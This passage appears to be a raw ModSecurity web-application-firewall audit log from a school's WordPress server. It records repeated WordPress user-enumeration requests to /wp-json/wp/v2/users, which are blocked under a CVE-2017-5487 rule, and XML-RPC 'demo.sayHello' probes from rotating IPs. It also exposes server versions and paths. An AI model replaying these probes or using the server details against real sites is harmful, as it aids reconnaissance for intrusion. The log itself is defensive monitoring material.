proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747496712109185 5571 (- - -) Stopwatch2: 1747496712109185 5571; combined=4113, p1=521, p2=3352, p3=45, p4=36, p5=94, sr=75, sw=65, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --86f52f20-Z-- --1377af2e-A-- [17/May/2025:22:45:13 +0700] aCivCem4kjNN-hEbWjKhZAAAAFg 103.236.140.4 41598 103.236.140.4 8181 --1377af2e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.42.15 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.42.15 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --1377af2e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1377af2e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747496713676994 2771 (- - -) Stopwatch2: 1747496713676994 2771; combined=1251, p1=446, p2=775, p3=0, p4=0, p5=30, sr=99, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1377af2e-Z-- --6318691e-A-- [17/May/2025:22:45:23 +0700] aCivE3yxdQCiyU1ENFehEAAAAAo 103.236.140.4 41628 103.236.140.4 8181 --6318691e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.42.15 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.42.15 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --6318691e-C-- demo.sayHello --6318691e-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --6318691e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747496723118447 4806 (- - -) Stopwatch2: 1747496723118447 4806; combined=3779, p1=450, p2=3125, p3=23, p4=24, p5=92, sr=65, sw=65, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6318691e-Z-- --6c96182d-A-- [17/May/2025:22:46:02 +0700] aCivOnyxdQCiyU1ENFehMAAAAAY 103.236.140.4 41756 103.236.140.4 8181 --6c96182d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.100.109 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.100.109 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --6c96182d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6c96182d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747496762373341 2783 (- - -) Stopwatch2: 1747496762373341 2783; combined=1225, p1=421, p2=774, p3=0, p4=0, p5=30, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6c96182d-Z-- --fab17433-A-- [17/May/2025:22:46:13 +0700] aCivRRKi5m5upc8uMd4YKwAAAMs 103.236.140.4 41834 103.236.140.4 8181 --fab17433-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.100.109 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.100.109 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --fab17433-C-- demo.sayHello --fab17433-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --fab17433-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747496773858539 5672 (- - -) Stopwatch2: 1747496773858539 5672; combined=4223, p1=518, p2=3450, p3=35, p4=36, p5=106, sr=75, sw=78, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fab17433-Z-- --f32aaf7e-A-- [17/May/2025:22:46:14 +0700] aCivRnyxdQCiyU1ENFehMwAAAA4 103.236.140.4 41844 103.236.140.4 8181 --f32aaf7e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.83.122 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.83.122 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --f32aaf7e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f32aaf7e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747496774684981 2768 (- - -) Stopwatch2: 1747496774684981 2768; combined=1250, p1=444, p2=775, p3=0, p4=0, p5=30, sr=82, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f32aaf7e-Z-- --6f62db51-A-- [17/May/2025:22:46:22 +0700] aCivTnyxdQCiyU1ENFehOAAAAAs 103.236.140.4 41866 103.236.140.4 8181 --6f62db51-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.83.122 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.83.122 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --6f62db51-C-- demo.sayHello --6f62db51-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --6f62db51-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747496782580292 6029 (- - -) Stopwatch2: 1747496782580292 6029; combined=4283, p1=540, p2=3513, p3=31, p4=34, p5=97, sr=73, sw=68, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6f62db51-Z-- --67221f57-A-- [17/May/2025:22:46:35 +0700] aCivW3yxdQCiyU1ENFehQAAAAAc 103.236.140.4 41926 103.236.140.4 8181 --67221f57-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.107.43 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.107.43 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --67221f57-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --67221f57-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747496795310556 2754 (- - -) Stopwatch2: 1747496795310556 2754; combined=1272, p1=409, p2=833, p3=0, p4=0, p5=29, sr=73, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --67221f57-Z-- --cd696d7f-A-- [17/May/2025:22:46:41 +0700] aCivYXyxdQCiyU1ENFehQgAAABM 103.236.140.4 41930 103.236.140.4 8181 --cd696d7f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.107.43 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.107.43 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --cd696d7f-C-- demo.sayHello --cd696d7f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --cd696d7f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747496801708485 5271 (- - -) Stopwatch2: 1747496801708485 5271; combined=3985, p1=461, p2=3253, p3=24, p4=86, p5=94, sr=67, sw=67, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cd696d7f-Z-- --4e8e742b-A-- [17/May/2025:22:46:54 +0700] aCivbhKi5m5upc8uMd4YMQAAAM8 103.236.140.4 41978 103.236.140.4 8181 --4e8e742b-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.176.177 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.176.177 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --4e8e742b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4e8e742b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747496814706071 2829 (- - -) Stopwatch2: 1747496814706071 2829; combined=1306, p1=430, p2=848, p3=0, p4=0, p5=28, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4e8e742b-Z-- --a2fa567a-A-- [17/May/2025:22:46:59 +0700] aCivc3yxdQCiyU1ENFehUgAAAAE 103.236.140.4 42018 103.236.140.4 8181 --a2fa567a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.176.177 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.176.177 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --a2fa567a-C-- demo.sayHello --a2fa567a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --a2fa567a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747496819792036 5752 (- - -) Stopwatch2: 1747496819792036 5752; combined=4228, p1=532, p2=3468, p3=32, p4=35, p5=95, sr=72, sw=66, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a2fa567a-Z-- --91cf3d1f-A-- [17/May/2025:22:47:15 +0700] aCivgxKi5m5upc8uMd4YSQAAAMQ 103.236.140.4 42146 103.236.140.4 8181 --91cf3d1f-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.93.117 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.93.117 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --91cf3d1f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --91cf3d1f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747496835075723 2768 (- - -) Stopwatch2: 1747496835075723 2768; combined=1271, p1=411, p2=832, p3=0, p4=0, p5=28, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --91cf3d1f-Z-- --2a79615d-A-- [17/May/2025:22:47:22 +0700] aCivium4kjNN-hEbWjKhaQAAAEE 103.236.140.4 42234 103.236.140.4 8181 --2a79615d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.93.117 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.93.117 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --2a79615d-C-- demo.sayHello --2a79615d-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --2a79615d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747496842384721 5569 (- - -) Stopwatch2: 1747496842384721 5569; combined=4121, p1=542, p2=3357, p3=31, p4=35, p5=92, sr=74, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2a79615d-Z-- --61d6c85d-A-- [17/May/2025:22:48:23 +0700] aCivx-m4kjNN-hEbWjKhagAAAFM 103.236.140.4 42350 103.236.140.4 8181 --61d6c85d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.103.225 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.103.225 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --61d6c85d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --61d6c85d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747496903117545 2904 (- - -) Stopwatch2: 1747496903117545 2904; combined=1298, p1=427, p2=840, p3=0, p4=0, p5=31, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --61d6c85d-Z-- --2118a622-A-- [17/May/2025:22:48:30 +0700] aCivzhKi5m5upc8uMd4YagAAANI 103.236.140.4 42360 103.236.140.4 8181 --2118a622-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.103.225 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.103.225 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --2118a622-C-- demo.sayHello --2118a622-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --2118a622-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747496910816790 5155 (- - -) Stopwatch2: 1747496910816790 5155; combined=3988, p1=478, p2=3278, p3=34, p4=31, p5=97, sr=70, sw=70, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2118a622-Z-- --c828fa0b-A-- [17/May/2025:22:49:45 +0700] aCiwGXyxdQCiyU1ENFehfgAAAAg 103.236.140.4 42574 103.236.140.4 8181 --c828fa0b-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.56.102 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.56.102 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --c828fa0b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c828fa0b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747496985279507 2333 (- - -) Stopwatch2: 1747496985279507 2333; combined=1205, p1=392, p2=784, p3=0, p4=0, p5=29, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c828fa0b-Z-- --e56d8278-A-- [17/May/2025:22:49:52 +0700] aCiwIOm4kjNN-hEbWjKhfAAAAEI 103.236.140.4 42654 103.236.140.4 8181 --e56d8278-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.56.102 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.56.102 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --e56d8278-C-- demo.sayHello --e56d8278-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --e56d8278-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747496992794348 5561 (- - -) Stopwatch2: 1747496992794348 5561; combined=4111, p1=531, p2=3357, p3=31, p4=35, p5=93, sr=74, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e56d8278-Z-- --4d706706-A-- [17/May/2025:22:50:23 +0700] aCiwPwTOsBn9MSWb6WLR0wAAAJY 103.236.140.4 43032 103.236.140.4 8181 --4d706706-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.78.135 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.78.135 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --4d706706-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4d706706-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure 